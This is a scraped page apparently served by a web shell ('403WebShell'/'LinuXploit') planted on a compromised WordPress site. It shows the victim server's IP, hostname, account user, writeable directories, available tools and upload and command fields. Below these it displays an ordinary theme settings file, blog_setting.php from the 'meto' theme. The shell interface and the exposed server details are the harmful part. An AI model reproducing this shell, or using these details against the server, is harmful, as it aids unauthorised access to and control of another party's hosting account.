Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.91.173
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/blog_setting.php
<?php

return array(
    'title'  => esc_html__('Blog Page Settings', 'meto'),
    'id'     => 'blog_setting',
    'desc'   => '',
    'icon'   => 'eicon-product-pages',
    'fields' => array(
        array(
            'id'      => 'blog_source_type',
            'type'    => 'button_set',
            'title'   => esc_html__('Blog Source Type', 'meto'),
            'options' => array(
                'd' => esc_html__('Default', 'meto'),
                'e' => esc_html__('Elementor', 'meto'),
            ),
            'default' => 'd',
        ),
        array(
            'id'       => 'blog_elementor_template',
            'type'     => 'select',
            'title'    => __('Template', 'meto'),
            'data'     => 'posts',
            'args'     => [
                'post_type' => [ 'elementor_library' ],
                'posts_per_page'=> -1,
            ],
            'required' => [ 'blog_source_type', '=', 'e' ],
        ),

        array(
            'id'       => 'blog_default_st',
            'type'     => 'section',
            'title'    => esc_html__('Blog Default', 'meto'),
            'indent'   => true,
            'required' => [ 'blog_source_type', '=', 'd' ],
        ),
        array(
            'id'      => 'blog_page_banner',
            'type'    => 'switch',
            'title'   => esc_html__('Show Banner', 'meto'),
            'desc'    => esc_html__('Enable to show banner on blog', 'meto'),
            'default' => true,
        ),
        array(
            'id'       => 'blog_banner_title',
            'type'     => 'text',
            'title'    => esc_html__('Banner Section Title', 'meto'),
            'desc'     => esc_html__('Enter the title to show in banner section', 'meto'),
            'required' => array( 'blog_page_banner', '=', true ),
        ),
        //array(
        //    'id'       => 'blog_page_background',
        //    'type'     => 'media',
        //    'url'      => true,
        //    'title'    => esc_html__('Background Image', 'meto'),
        //    'desc'     => esc_html__('Insert background image for banner', 'meto'),
        //    'default'  => '',
        //    'required' => array( 'blog_page_banner', '=', true ),
        //),

        array(
            'id'       => 'blog_sidebar_layout',
            'type'     => 'image_select',
            'title'    => esc_html__('Layout', 'meto'),
            'subtitle' => esc_html__('Select main content and sidebar alignment.', 'meto'),
            'options'  => array(

                'left'  => array(
                    'alt' => esc_html__('2 Column Left', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/2cl.png',
                ),
                'full'  => array(
                    'alt' => esc_html__('1 Column', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/1col.png',
                ),
                'right' => array(
                    'alt' => esc_html__('2 Column Right', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/2cr.png',
                ),
            ),

            'default' => 'right',
        ),

        array(
            'id'       => 'blog_page_sidebar',
            'type'     => 'select',
            'title'    => esc_html__('Sidebar', 'meto'),
            'desc'     => esc_html__('Select sidebar to show at blog listing page', 'meto'),
            'required' => array(
                array( 'blog_sidebar_layout', '=', array( 'left', 'right' ) ),
            ),
            'options'  => meto_get_sidebars(),
        ),
        array(
            'id'      => 'blog_post_comments',
            'type'    => 'switch',
            'title'   => esc_html__('Show Post Comments', 'meto'),
            'desc'    => esc_html__('Enable to show post comments on posts listing', 'meto'),
            'default' => true,
        ),

        array(
            'id'      => 'blog_post_author',
            'type'    => 'switch',
            'title'   => esc_html__('Show Author', 'meto'),
            'desc'    => esc_html__('Enable to show author on posts listing', 'meto'),
            'default' => true,
        ),
        array(
            'id'      => 'blog_post_date',
            'type'    => 'switch',
            'title'   => esc_html__('Show Post Date', 'meto'),
            'desc'    => esc_html__('Enable to show post data on posts listing', 'meto'),
            'default' => true,
        ),
        array(
            'id'       => 'blog_default_ed',
            'type'     => 'section',
            'indent'   => false,
            'required' => [ 'blog_source_type', '=', 'd' ],
        ),
    ),
);

Youez - 2016 - github.com/yon3zu
LinuXploit